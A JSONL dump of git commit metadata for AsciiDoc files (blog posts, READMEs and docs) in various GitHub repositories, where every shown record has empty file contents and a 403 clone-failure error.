{"commit":"d02147a19a5488a5eb815cb17056227a6d92f2a0","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4872b9e6e95293ecccd696e2f6af4d490ee8943","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f330e8ff0d030dd935191a3984132988e0c7d6f","subject":"Blog post on QR Code support for Android Client","message":"Blog post on QR Code support for Android 
Client\n","repos":"tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/20\/qr-android.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/20\/qr-android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b698aa26379b0d0e9eb140f14c8a86f358888b2","subject":"y2b create post 14-Core Mac Pro Killer PC?","message":"y2b create post 14-Core Mac Pro Killer PC?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-10-14Core-Mac-Pro-Killer-PC.adoc","new_file":"_posts\/2015-11-10-14Core-Mac-Pro-Killer-PC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"665d31667874af1fd08360cd7f1aaf776acc1b3b","subject":"Adding Angular-CLI documentation.","message":"Adding Angular-CLI documentation.\n\nFixes #7 #15\n","repos":"platosha\/angular-polymer,vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer,vaadin\/angular2-polymer","old_file":"docs\/ng-cli.adoc","new_file":"docs\/ng-cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6d3836c6c08bf9a40914dac73247673aff26ca3","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"339cedf30d383695dcb97bc9de22e8bc01bd71d5","subject":"y2b create post New Trent iCarrier Unboxing (IMP120D Unboxing - External Battery)","message":"y2b create post New Trent iCarrier Unboxing (IMP120D Unboxing - External 
Battery)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-02-New-Trent-iCarrier-Unboxing-IMP120D-Unboxing--External-Battery.adoc","new_file":"_posts\/2012-09-02-New-Trent-iCarrier-Unboxing-IMP120D-Unboxing--External-Battery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1645c67e67c1c124c2765ac1cbf1e15e60e82d15","subject":"Update README.adoc","message":"Update README.adoc","repos":"trisberg\/spring-xd-samples,morfeo8marc\/spring-xd-samples,constantlearner\/spring-xd,huunhancit\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,felipeg48\/spring-xd-samples,spring-projects\/spring-xd-samples,constantlearner\/spring-xd,spring-projects\/spring-xd-samples,trisberg\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,spring-projects\/spring-xd-samples,ghillert\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,ghillert\/spring-xd-samples,trisberg\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples,morfeo8marc\/spring-xd-samples,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,felipeg48\/spring-xd-samples,felipeg48\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,felipeg48\/spring-xd-samples,felipeg48\/spring-xd-samples,morfeo8marc\/spring-xd-samples,constantlearner\/spring-xd,rajkumargithub\/spring-xd-samples,spring-projects\/spring-xd-samples,trisberg\/spring-xd-samples,rajkumargithub\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,trisberg\/spring-xd-samples,ghillert\/spring-xd-samples,huunhancit\/spring-xd-samples,morfeo8marc\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,felipeg48\/spring-xd-samples,trisberg\/spring-xd-samples","old_file":"analytics-pmml\/README.adoc","new_file":"analytics-pmml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/constantlearner\/spring-xd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72ea1b97f1ea672bcf235c084784d39b82836750","subject":"Update 2015-05-18-A-Remplacer.adoc","message":"Update 2015-05-18-A-Remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c515cd8c5b099e7464478daa33aec2ccf95f1ccf","subject":"Update 2015-11-05-Hello-world.adoc","message":"Update 
2015-11-05-Hello-world.adoc","repos":"puff-tw\/hubpress.io,puff-tw\/hubpress.io,puff-tw\/hubpress.io","old_file":"_posts\/2015-11-05-Hello-world.adoc","new_file":"_posts\/2015-11-05-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puff-tw\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe0c44ce21497d991e094d1b92bcaa46aad4d58","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50d73c9f6c11e6b456a5d564637a7d07bc282e55","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e55e5d446a5dde24fd0eaf3fe372628341a3e7ea","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ed146cbfdcab1436cba6f7b38570f694f75dba","subject":"Add release steps","message":"Add release steps\n","repos":"spring-projects\/spring-ldap,spring-projects\/spring-ldap,spring-projects\/spring-ldap,spring-projects\/spring-ldap,spring-projects\/spring-ldap","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-ldap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b54406b9aed358dd5efff315be1aa06673fe063","subject":"Update 2016-04-05-Analizando-el-codigo.adoc","message":"Update 2016-04-05-Analizando-el-codigo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Analizando-el-codigo.adoc","new_file":"_posts\/2016-04-05-Analizando-el-codigo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"feb85942b3ef2a0620d3366d423fcc7cb3aded98","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b43345103acd38e830b6b04a3471316a604edb7f","subject":"Initial notes","message":"Initial notes\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/README.adoc","new_file":"workflows\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17b9f3335181c9bbce6d95ec9dc2ea7e3c3481f5","subject":"SEC-2378: Fix CSRF MultipartFilter doc typo","message":"SEC-2378: Fix CSRF MultipartFilter doc typo\n","repos":"panchenko\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,rwinch\/spring-security,panchenko\/spring-security,pwheel\/spring-security,wilkinsona\/spring-security,diegofernandes\/spring-security,zhaoqin102\/spring-security,panchenko\/spring-security,chinazhaoht\/spring-security,djechelon\/spring-security,follow99\/spring-security,ajdinhedzic\/spring-security,jgrandja\/spring-security,caiwenshu\/spring-security,adairtaosy\/spring-security,pkdevbox\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,wilkinsona\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,rwinch\/spring-security,raindev\/spring-security,yinhe402\/spring-security,rwinch\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,tekul\/spring-security,SanjayUser\/SpringSecurityPro,pwheel\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,raindev\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,ollie314\/spring-security,ractive\/spring-security,adairtaosy\/spring-security,tekul\/spring-security,fhanik\/spring-security,ajdinhedzic\/spring-security,liuguohua\/spring-security,forestqqqq\/spring-security,ractive\/spring-security,eddumelendez\/spring-security,Xcorpio\/spring-security,follow99\/spring-security,mparaz\/spring-security,cyratech\/spring-security,izeye\/spring-security,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,yinhe402\/spring-security,izeye\/spring-security,pkdevbox\/spring-security,driftman\/spring-security,mrkingybc\/spring-security,wkorando\/spring-security,ajdinhedzic\/spring-security,cyratech\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,adairtaosy\/spring-security,pkdevbox\/spring-security,Peter32\/spring-security,mrkingybc\/spring-security,Krasnyanskiy\/spring-security,mparaz\/spring-security,forestqqqq\/spring-security,liuguohua\/spring-security,eddumelendez\/spring-security,thomasdarimont\/spring-security,vitorgv\/spring-security
,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,wkorando\/spring-security,wkorando\/spring-security,ractive\/spring-security,forestqqqq\/spring-security,ajdinhedzic\/spring-security,mounb\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,raindev\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,caiwenshu\/spring-security,wilkinsona\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,mparaz\/spring-security,xingguang2013\/spring-security,raindev\/spring-security,djechelon\/spring-security,caiwenshu\/spring-security,zgscwjm\/spring-security,zshift\/spring-security,xingguang2013\/spring-security,kazuki43zoo\/spring-security,rwinch\/spring-security,chinazhaoht\/spring-security,thomasdarimont\/spring-security,hippostar\/spring-security,MatthiasWinzeler\/spring-security,ollie314\/spring-security,driftman\/spring-security,Peter32\/spring-security,kazuki43zoo\/spring-security,wilkinsona\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,SanjayUser\/SpringSecurityPro,zhaoqin102\/spring-security,izeye\/spring-security,hippostar\/spring-security,panchenko\/spring-security,yinhe402\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,fhanik\/spring-security,likaiwalkman\/spring-security,Peter32\/spring-security,fhanik\/spring-security,mrkingybc\/spring-security,follow99\/spring-security,Krasnyanskiy\/spring-security,tekul\/spring-security,zgscwjm\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,wkorando\/spring-security,diegofernandes\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,follow99\/spring-security,olezhuravlev\/spring-security,mounb\/spring-security,zshift\/spring-security,djechelon\/spring-security,jmnarloch\/spring-security,Xcorpio\/spring-security,diegofernandes\/spring-security,jmnarloch\/spring-security,thomasdarimont\/spring-security,diegofernandes\/spring-security,mrkingybc\/spring-security,tekul\/spring-security,cyratech\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,mdeinum\/spring-security,xingguang2013\/spring-security,kazuki43zoo\/spring-security,chinazhaoht\/spring-security,driftman\/spring-security,MatthiasWinzeler\/spring-security,hippostar\/spring-security,rwinch\/spring-security,fhanik\/spring-security,olezhuravlev\/spring-security,xingguang2013\/spring-security,izeye\/spring-security,mdeinum\/spring-security,zshift\/spring-security,vitorgv\/spring-security,ractive\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,Xcorpio\/spring-security,mounb\/spring-security,zhaoqin102\/spring-security,driftman\/spring-security,vitorgv\/spring-security,Krasnyanskiy\/spring-security,likaiwalkman\/spring-security,jmnarloch\/spring-security,pwheel\/spring-security,mparaz\/spring-security,eddumelendez\/spring-security,thomasdarimont\/spring-security,zgscwjm\/spring-security,liuguohua\/spring-security,caiwenshu\/spring-security,likaiwalkman\/spring-security,chinazhaoht\/spring-security,vitorgv\/spring-security,hippostar\/spring-security,adairtaosy\/spring-security,Xcorpio\/spring-security,pkdevbox\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,zhaoqin102\/spring-security,fhanik\/spring-security,cyratech\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal
: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5c393e46d440d45b4a5b89ed490b762293cf47b","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"595d94b9516b057e1c51db55a6b747bbe8018252","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c583ff5533b32e4e7c198d9fd987628a5c52b28","subject":"Update 2015-08-19-Test-Post.adoc","message":"Update 2015-08-19-Test-Post.adoc","repos":"matthewbadeau\/matthewbadeau.github.io,matthewbadeau\/matthewbadeau.github.io,matthewbadeau\/matthewbadeau.github.io","old_file":"_posts\/2015-08-19-Test-Post.adoc","new_file":"_posts\/2015-08-19-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthewbadeau\/matthewbadeau.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fad0b655e34cd5f6f05d29b509332f9ae87507b2","subject":"Python - IPython notebook: zooming in a pylab plot","message":"Python - IPython notebook: zooming in a pylab plot\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bc703f3ccca500e0194c70e83811121b0c35f5cf","subject":"Description","message":"Description\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e3877eba366760133775362c296bd84ac80a806","subject":"Initial README","message":"Initial README\n","repos":"sneakybeaky\/aws-volumes,sneakybeaky\/ebs-volumes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sneakybeaky\/ebs-volumes.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de0a394c00cdc7dd1b7fb9fbd9a4a6882d578d68","subject":"docs: 
add hide\/unhide contract to JSONRPC","message":"docs: add hide\/unhide contract to JSONRPC\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5276c230e1d689dcdc5ee18f9fb6e63cd31a8f0","subject":"ASDF quick start","message":"ASDF quick start\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b1f8bb22d6d94fd8565d1bf716fdfc7e2163e685","subject":"Update 2017-02-17-jquery-good-and-more.adoc","message":"Update 2017-02-17-jquery-good-and-more.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-jquery-good-and-more.adoc","new_file":"_posts\/2017-02-17-jquery-good-and-more.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a3550351b8d590a14027d3f5686173436c9b955","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebdb095ca2e0c3f0d7c042d863f8fd8f0e7e610d","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2c81b7e0e1b9354d8035aaeaa0e0eba10bf2d68","subject":"Update 2016-07-03-Some-Flowers.adoc","message":"Update 2016-07-03-Some-Flowers.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-03-Some-Flowers.adoc","new_file":"_posts\/2016-07-03-Some-Flowers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6b54b441ab835a545e2829a9b7b0f88a07f7395","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 
2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47f03bfb551f2a73a9db409ff8931bb3afa02e7a","subject":"Update 2015-06-19-Breizhcamp-Saison-5.adoc","message":"Update 2015-06-19-Breizhcamp-Saison-5.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-19-Breizhcamp-Saison-5.adoc","new_file":"_posts\/2015-06-19-Breizhcamp-Saison-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d4a458c5a42067ee28be900e7efed1fd1a00d3f","subject":"Update 2015-09-20-dogs_in_india.adoc","message":"Update 2015-09-20-dogs_in_india.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-20-dogs_in_india.adoc","new_file":"_posts\/2015-09-20-dogs_in_india.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0780588f44ba7cd17da027dc95f8714bebc17a24","subject":"docs update for 0.7.5","message":"docs update for 0.7.5\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db8741779422c3c1ba52d2a0c40aa9596bbd260b","subject":"Update 2015-09-18-Malaysia-Airlines.adoc","message":"Update 2015-09-18-Malaysia-Airlines.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Malaysia-Airlines.adoc","new_file":"_posts\/2015-09-18-Malaysia-Airlines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b72c4a0b41df4352ed3c84da7f5a1f3e96f1f098","subject":"Deleted 2016-11-10.adoc","message":"Deleted 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"2016-11-10.adoc","new_file":"2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4014fbed6a4342df9ac8da8db2ef1c194042603e","subject":"Create Binary-Repository-Manager-Feature-Matrix.adoc","message":"Create 
